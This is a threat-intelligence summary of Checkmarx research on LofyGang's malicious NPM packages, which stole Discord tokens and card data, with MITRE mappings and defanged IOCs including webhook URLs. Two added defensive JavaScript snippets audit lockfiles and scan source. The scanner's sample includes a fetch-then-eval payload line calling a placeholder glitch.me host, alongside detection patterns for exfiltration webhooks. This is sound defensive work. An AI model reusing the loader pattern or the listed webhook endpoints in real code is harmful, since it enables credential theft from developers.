LofyGang – Software Supply Chain Attackers; Organized, Persistent, and Operating for Over a Year

Checkmarx identified roughly 200 malicious NPM packages linked to the crime group LofyGang that abused typosquatting, sub-dependencies, and legitimate cloud services to distribute credential-stealing and Discord-targeted malware. The actors used Discord bots and webhooks for command-and-control and exfiltration, and Checkmarx published a tracker and package list to aid defenders. #LofyGang #NPM

Keypoints

  • Researchers traced ~200 malicious open-source packages on NPM tied to the LofyGang group, with thousands of installations.
  • LofyGang employed typosquatting and “starjacking” to appear legitimate and trick developers into installing malicious packages.
  • Attackers hid malicious code in sub-dependencies so first-level packages stayed clean while delivering payloads at runtime.
  • Malicious payloads included password/credential stealers and Discord-specific implants that modify the installed Discord client to capture payment data.
  • Command-and-control and payload hosting used legitimate services (Discord, Repl.it, Glitch, GitHub, Heroku) and Discord webhooks for exfiltration.
  • Payloads were obfuscated and contained anti-deobfuscation measures that jam debugging tools and the event loop.
  • Checkmarx published a public tracker (https://lofygang.info/) and a gist listing the malicious packages for community detection and remediation.
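The delivery tricks in the keypoints above (typosquatting, starjacking, and hiding the payload in a sub-dependency) can be hunted for in a project's lockfile. The following is an added example, not Checkmarx's code or a tool from the report: it walks a constructed package-lock v2/v3 `packages` map (with each entry's `repository` assumed to be merged in from its installed package.json) and flags names close to a made-up popular-package list, repository URLs that do not match the package name, and install scripts, noting whether each hit is transitive.

```javascript
// Added example (not Checkmarx's code): audit an npm lockfile for the delivery
// tricks described above. LOCK is a constructed package-lock v2/v3 "packages" map
// with each entry's "repository" merged in from its installed package.json.
const POPULAR = ['express', 'lodash', 'discord.js', 'colors', 'chalk']; // made-up allowlist
// Levenshtein distance, used to spot typosquats of popular names.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++)
    for (let j = 1; j <= b.length; j++)
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1,
                         d[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1));
  return d[a.length][b.length];
}

// Starjacking heuristic: the repository field points at a GitHub repo whose name
// does not resemble the package name, so the stars shown were earned elsewhere.
function repoMismatch(name, repoUrl) {
  const m = /github\.com\/[^/]+\/([^/.]+)/.exec(repoUrl || '');
  if (!m) return false;
  const repo = m[1].toLowerCase();
  const pkg = name.replace(/^@[^/]+\//, '').toLowerCase(); // drop @scope/
  return !repo.includes(pkg) && !pkg.includes(repo);
}

// Walk the lockfile. Anything the root package did not declare is a transitive
// (sub-)dependency, where the payload sat so the first-level package stayed clean.
function auditLock(lock) {
  const direct = new Set(Object.keys(lock.packages[''].dependencies || {}));
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages)) {
    if (path === '') continue;
    const name = path.slice(path.lastIndexOf('node_modules/') + 'node_modules/'.length);
    const reasons = [];
    const near = POPULAR.find(p => p !== name && editDistance(p, name) <= 2);
    if (near) reasons.push('typosquat-of:' + near);
    if (repoMismatch(name, meta.repository)) reasons.push('repo-mismatch');
    if (meta.hasInstallScript) reasons.push('install-script'); // runs code at install time
    if (reasons.length) findings.push({ name, transitive: !direct.has(name), reasons });
  }
  return findings;
}
const LOCK = { packages: { // constructed sample lockfile
  '': { dependencies: { 'discord.js': '^14.0.0', 'colorful-console': '^1.0.0' } },
  'node_modules/discord.js': { version: '14.0.0', repository: 'https://github.com/discordjs/discord.js' },
  'node_modules/colorful-console': { version: '1.0.0', repository: 'https://github.com/someorg/colors.js' },
  'node_modules/colorful-console/node_modules/lodas': { version: '0.0.3', hasInstallScript: true, repository: 'https://github.com/someorg/lodas' },
} };
console.log(JSON.stringify(auditLock(LOCK), null, 2));
```

In the sample, the clean-looking direct dependency is reported only for its borrowed repository, while the nested `lodas` package is reported as a transitive typosquat with an install script.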

MITRE Techniques

  • [T1195] Supply Chain Compromise – LofyGang published malicious packages to public repositories: ‘…trace ~200 malicious open-source packages published in the past year.’
  • [T1036] Masquerading – Used typosquatting and repository references to impersonate legitimate packages: ‘…Typosquatting is a technique… like “falsk” instead of “flask.”’
  • [T1195] Software Supply Chain – Hiding malicious code in sub-dependencies so top-level packages remain clean: ‘…keep the first-level package clean from malicious code, but having it depend on another package that introduces the malicious code.’
  • [T1071.004] Application Layer Protocol: Web Services – Using legitimate cloud and web services as C2 channels: ‘…Discord, Repl.it, glitch, GitHub, and Heroku are just a few services LofyGang is using as C2 servers.’
  • [T1056] Input Capture – Modifying the Discord client to hook and capture payment/credential data: ‘…modifying the installed Discord instance with hooks to steal credit cards, sent via Discord webhook…’
  • [T1105] Ingress Tool Transfer – Malicious packages sometimes downloaded payloads at runtime from C2 servers: ‘…some downloaded the malicious payload during runtime from c2 servers.’
  • [T1567.002] Exfiltration Over Web Service – Stolen data sent via Discord webhooks to attacker-controlled endpoints: ‘…sent via Discord webhook straight to the attackers whenever a payment was made.’
  • [T1027] Obfuscated Files or Information – Payloads were obfuscated and included anti-deobfuscation checks to disrupt analysis: ‘…added anti-deobfuscation statements… unpack a naïve regular expression that jams the event loop…’
  • [T1609] Supply Chain Compromise: Subcomponent – Re-publishing replacement malicious dependent packages after takedown to regain delivery channels: ‘…whenever the malicious dependent package was caught and removed, the attackers would replace it with a new one…’

Indicators of Compromise

  • [Discord webhooks] Exfiltration endpoints used by malware – hxxps://canary[.]discord[.]com/api/webhooks/1010307578896584765/Kfko3kvm_uwgTjZlGgmTnHirUnfqDagEyMjXrPBKn-9oSJXR2-s1SOMxe4zsq_JpbbA6, hxxps://discord[.]com/api/webhooks/1007006820629483640/PcVef3zPDULoGoHQBQu1WK_pLYOMtOdk6ynz0wqSFJf6yv0Ro5iZpMLiZ3Pe4aVKxk-j, and many more webhook URLs listed.
  • [Malicious domains / hosting URLs] C2 and payload hosting – hxxps://frequent-level-cornflower[.]glitch[.]me, hxxps://lofy[.]polarlofy7[.]repl[.]co, and additional Glitch/Repl.it/Heroku endpoints.
  • [GitHub repositories / raw URLs] Payload and injector hosting – hxxps://github[.]com/NotFubukIl/DiscordTokenGrabber, hxxps://raw[.]githubusercontent[.]com/Balenciaga7/client/main/client[.]js, and other raw GitHub URLs.
  • [Paste sites / raw drops] Runtime payload or configuration – hxxps://pastebin[.]com/raw/HMgsiG4k, hxxps://www[.]klgrth[.]io/paste/62fo9/raw, plus several other paste/raw endpoints.
  • [Malicious package names / GitHub tools] Known malicious packages and tools – examples include ‘small-sm’ (malicious dependency), ‘fetch-string’ (linked to marketing account), and ‘Discord-Mass-Dm’ which depended on a malicious package.
  • [Tracking and reports] Research artifacts – tracker site hxxps://lofygang.info/ and package list gist https://gist.github.com/jossef/aaa9e45c062d973f18bd87c43b9c4fc7

Checkmarx researchers detected LofyGang activity initially via internal engine alerts and then expanded the investigation using retro-hunting to recover deleted package artifacts and historical metadata. They correlated IOC patterns across NPM, GitHub, Repl.it, Glitch, Heroku, and Discord to link roughly 200 malicious packages, using internal tools to reconstruct removed packages and map dependency chains that revealed runtime payload fetches and active C2 locations.

The attackers used a layered delivery approach: typosquatted and starjacked packages to lure developers, clean top-level packages that depended on malicious sub-packages (allowing replacement after takedowns), and runtime fetching of payloads from attacker-controlled web services. Payloads included credential/password stealers and Discord-specific implants that modify the installed Discord client to hook payment flows; stolen data was exfiltrated via Discord webhooks and bespoke bots.

Analysis revealed deliberate defenses against analysts: heavy obfuscation and anti-deobfuscation logic that jams the event loop and thwarts automated unpacking tools. Defenders should focus on detecting irregular package naming and metadata, monitoring dependency trees for unknown sub-dependencies, blocking known C2 domains and webhooks, and preserving repository artifacts for retro-hunting so that malicious supply-chain activity can be tracked and attributed. Read more: https://checkmarx.com/blog/lofygang-software-supply-chain-attackers-organized-persistent-and-operating-for-over-a-year/
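The recommendation to block known C2 domains and webhooks extends naturally to scanning package source before it runs. The following is an added example, not from the Checkmarx report: it scans JavaScript source for Discord webhook URLs, the free hosting services the report names as payload and C2 locations, dynamic code execution, and a crude nested-quantifier regex heuristic for the event-loop-jamming trick. `SAMPLE` is a constructed source snippet whose webhook id, token, and URLs are fake.

```javascript
// Added example (not from the Checkmarx report): scan JavaScript source for the
// exfiltration, hosting and anti-analysis patterns the report attributes to
// LofyGang. SAMPLE is constructed; its webhook id/token and URLs are fake.
const WEBHOOK = /https?:\/\/(?:canary\.|ptb\.)?discord(?:app)?\.com\/api\/webhooks\/\d+\/[\w-]+/g;
// Free hosting services the report names as payload and C2 locations.
const HOSTS = /https?:\/\/[\w.-]*(?:glitch\.me|repl\.co|herokuapp\.com|pastebin\.com\/raw|raw\.githubusercontent\.com)\/[^\s'"]*/g;
// Dynamic code execution, the other half of a fetch-then-run payload loader.
const DYN_EVAL = /\b(?:eval|new\s+Function)\s*\(/;
// Crude heuristic for a nested quantifier like (a+)+, the kind of regex that
// can stall the event loop when an analysis tool evaluates it.
const NESTED_QUANT = /\([^()]*[+*]\)[+*]/;

function scanSource(src) {
  const findings = [];
  src.split('\n').forEach((line, i) => {
    for (const m of line.matchAll(WEBHOOK)) findings.push({ line: i + 1, kind: 'discord-webhook', value: m[0] });
    for (const m of line.matchAll(HOSTS)) findings.push({ line: i + 1, kind: 'free-hosting-url', value: m[0] });
    if (DYN_EVAL.test(line)) findings.push({ line: i + 1, kind: 'dynamic-eval', value: line.trim() });
    const q = NESTED_QUANT.exec(line);
    if (q) findings.push({ line: i + 1, kind: 'nested-quantifier-regex', value: q[0] });
  });
  return findings;
}

const SAMPLE = `
const hook = "https://discord.com/api/webhooks/000000000000000000/FAKE_TOKEN_placeholder-abc";
const payload = await (await fetch("https://example-name.glitch.me/client.js")).text();
eval(payload);
const slow = /(a+)+$/;
`;
console.log(scanSource(SAMPLE));
```

A single hit is only a lead; a file combining a free-hosting fetch with dynamic evaluation, or a webhook URL with no legitimate reason to exist in a library, is what merits a block and a closer look.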